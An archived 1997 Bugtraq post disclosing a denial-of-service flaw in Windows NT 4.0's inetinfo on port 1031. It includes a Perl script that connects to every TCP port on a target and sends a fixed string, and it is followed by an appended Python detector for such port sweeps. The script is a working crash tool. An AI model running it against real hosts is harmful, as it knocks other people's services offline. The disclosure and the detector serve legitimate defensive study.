Bugtraq mailing list archives
[NTSEC] NT vulnerable to DOS attack on more than just port 135
From: cklaus () iss net (Bob Beck)
Date: Sat, 25 Jan 1997 12:06:11 -0600
Looks like NT is also vulnerable to exactly the same attack as previously posted WRT connecting and throwing garbage at port 135 on another port, namely 1031 (inetinfo). The inetinfo.exe process goes insane on NT4.0. Haven't tested on 3.51.

To try, telnet to 1031 on an NT machine and type garbage, then disconnect. Below is what me and Chris Bayly (Chris.Bayly () ualberta ca) rigged up to check.

-Bob
---------------------------------------------------------------------------
Bob Beck                    Obtuse Systems Corporation
beck () obtuse com          http://www.obtuse.com/
True Evil hides its real intentions in its street address.
Search and you shall find it, and the truth shall set you free.
------------------------------8<----------------------------------
#!/usr/local/bin/perl

use Socket;
use FileHandle;
require "chat2.pl";

$ILoveBill = $ARGV[0] && shift;

$verbose = 0; # tell me what you're hitting
$knownports = 0; # don't hit known problem ports

for ($port = $0; $port<65535; $port++)
{
    if ($knownports && ($port == 135 || $port== 1031)) {
        next;
    }
    $fh = chat::open_port($ILoveBill, $port);
    chat::print ($fh,"Windows NT is the platform of the future");
    if ($verbose) {
        print "Trying port: $port\n\n";
    }
    chat::close($fh);
}
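A defender's view of the script above, as an added example that is not part of the original post: it flags any source that connects to many TCP ports in ascending order with an identical payload size inside a short window, and reports which of the two ports named in the post (135 and 1031) that source touched. The record format, thresholds and addresses are assumptions, and the sample records are constructed.

```python
from collections import defaultdict

KNOWN_PROBLEM_PORTS = {135, 1031}   # the two ports named in the post
# Size of the fixed string the posted script writes to every port.
PAYLOAD_LEN = len("Windows NT is the platform of the future")

def make_sample():
    """Constructed connection records: (time_s, source, dst_port, bytes_received)."""
    sweep = [(100 + i * 0.01, "10.0.0.66", 100 + i, PAYLOAD_LEN) for i in range(1000)]
    normal = [(101.0, "10.0.0.5", 80, 412), (101.5, "10.0.0.5", 80, 388),
              (102.0, "10.0.0.7", 135, 72), (103.0, "10.0.0.7", 1031, 160)]
    return sweep + normal

def find_sweeps(records, window_s=10.0, min_ports=50, min_ascending=0.9):
    """Return {source: [known problem ports touched]} for sources that sweep ports.

    A source is flagged when, inside one sliding time window, it reaches at least
    min_ports distinct ports, mostly in ascending order, sending the same number
    of bytes each time (the pattern a fixed-string loop over ports produces).
    """
    by_src = defaultdict(list)
    for t, src, port, nbytes in sorted(records):
        by_src[src].append((t, port, nbytes))

    findings = {}
    for src, conns in by_src.items():
        start = 0
        for end in range(len(conns)):
            # Shrink the window from the left until it spans at most window_s.
            while conns[end][0] - conns[start][0] > window_s:
                start += 1
            window = conns[start:end + 1]
            ports = [p for _, p, _ in window]
            if len(set(ports)) < min_ports:
                continue
            rising = sum(1 for a, b in zip(ports, ports[1:]) if b > a)
            ascending = rising / max(len(ports) - 1, 1)
            same_size = len({n for _, _, n in window}) == 1
            if ascending >= min_ascending and same_size:
                touched = {p for _, p, _ in conns}
                findings[src] = sorted(KNOWN_PROBLEM_PORTS & touched)
                break
    return findings

if __name__ == "__main__":
    for src, ports in find_sweeps(make_sample()).items():
        print(f"{src}: sequential port sweep, known problem ports touched: {ports}")
```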